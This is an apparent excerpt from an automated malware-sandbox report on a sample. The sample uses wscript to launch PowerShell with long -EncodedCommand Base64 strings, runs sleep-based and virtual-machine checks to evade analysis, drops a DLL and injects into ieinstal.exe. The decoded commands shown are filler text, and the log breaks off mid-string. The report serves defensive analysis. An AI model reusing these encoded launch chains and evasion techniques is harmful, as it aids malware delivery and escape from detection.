    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 392Thread sleep count: 81 > 30
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 392Thread sleep time: -6075000s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.dllJump to dropped file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8057
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread delayed: delay time: 75000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformation
    Source: ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPort

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 630000
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra Skan
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Base64 decoded #meso dittog stjerthage Prevaricat1 Pyrol6 delumini Tastear7 tropo engr nonrepenta #Smitty1 SPRENG UNVIS Allerhv Archip9 RINGMRKNI Uncon9 JENBRY Ejakule STJER KOMMUNIK Sortk8 phae Uqvsy Monop3 Countercl1 baalambs Explosibl EPIGR Cephalohum tegnt GPSEMULS Aflaas6 Asbk6 #abidi Peng9 apha Caulkers TRFFE Typhoonto3 krapinaf Enligsti2 Sankthans Gennem8 Celiec6 Katj #Epilepsien SEMISOLU sprednin METHY Parame Brnehave2 GERMANIST DRETSS ENSPORETH Stedmod7 Svovlsyre Borgerr Kolport1 pleurot #bonsai Pseudo fritidscen TEATERGN PLANERS VINDM Spalte Tabel2 Ambadeedie Cindersban Coatt3 CHROMAT carl Stift1 stvfn Kommuna3 RRTAN Nonoil #septenat Pseudoamb8 Nonracia Vlgeresk3 Dogho Programm FLUGTSKYD claust SELVFIN #dispens AFFALDSP Plnerner Gordykn1 Bioel Rhiz Nonadja9 Bris2 STUD korporligt Charcuti2 Maltingpe6 Sikkerh3 UNITINGIN disens #SPIS strykni Treasure2 freez Disorde Cifferfl metages Ustemp efterkomm Synsms4 LNSLAVESR Cats4 sovs Wins Precepta7 TARSOMAL Obsternasi4 EFTERTR Bleskud2 #woolensr PLOCEIFORM Rauno TYPER innuendo RAPP Bogstavk ubes Absinth Forsknin HOTELVRT Skinn bedriften BROK forskudsb Misi Auma6 Mossernes #Hemihyperi Aikos makrofu pillmaking Habanerasd Trol6 RYGTIKAMPE TRFLERNEPO modstands Dynami pulvin Hysterecto1 Mtni chart LEMMATAAN Knsk6 filstrukt #KOERSLE STYREVARIA Blnde Sedim4 CROS DUELLERE krummesu Pseudop sher Standhaf forve Skatteafde REVERSA TRILLIONTA Prrie Hvid Damr1 Unsu9 sanjaspew flyde LINGUOVERS Respo9 #tilf Shotgunaf6 Zuniss2 b
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra Skan
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Base64 decoded #meso dittog stjerthage Prevaricat1 Pyrol6 delumini Tastear7 tropo engr nonrepenta #Smitty1 SPRENG UNVIS Allerhv Archip9 RINGMRKNI Uncon9 JENBRY Ejakule STJER KOMMUNIK Sortk8 phae Uqvsy Monop3 Countercl1 baalambs Explosibl EPIGR Cephalohum tegnt GPSEMULS Aflaas6 Asbk6 #abidi Peng9 apha Caulkers TRFFE Typhoonto3 krapinaf Enligsti2 Sankthans Gennem8 Celiec6 Katj #Epilepsien SEMISOLU sprednin METHY Parame Brnehave2 GERMANIST DRETSS ENSPORETH Stedmod7 Svovlsyre Borgerr Kolport1 pleurot #bonsai Pseudo fritidscen TEATERGN PLANERS VINDM Spalte Tabel2 Ambadeedie Cindersban Coatt3 CHROMAT carl Stift1 stvfn Kommuna3 RRTAN Nonoil #septenat Pseudoamb8 Nonracia Vlgeresk3 Dogho Programm FLUGTSKYD claust SELVFIN #dispens AFFALDSP Plnerner Gordykn1 Bioel Rhiz Nonadja9 Bris2 STUD korporligt Charcuti2 Maltingpe6 Sikkerh3 UNITINGIN disens #SPIS strykni Treasure2 freez Disorde Cifferfl metages Ustemp efterkomm Synsms4 LNSLAVESR Cats4 sovs Wins Precepta7 TARSOMAL Obsternasi4 EFTERTR Bleskud2 #woolensr PLOCEIFORM Rauno TYPER innuendo RAPP Bogstavk ubes Absinth Forsknin HOTELVRT Skinn bedriften BROK forskudsb Misi Auma6 Mossernes #Hemihyperi Aikos makrofu pillmaking Habanerasd Trol6 RYGTIKAMPE TRFLERNEPO modstands Dynami pulvin Hysterecto1 Mtni chart LEMMATAAN Knsk6 filstrukt #KOERSLE STYREVARIA Blnde Sedim4 CROS DUELLERE krummesu Pseudop sher Standhaf forve Skatteafde REVERSA TRILLIONTA Prrie Hvid Damr1 Unsu9 sanjaspew flyde LINGUOVERS Respo9 #tilf Shotgunaf6 Zuniss2 b
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcw
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAU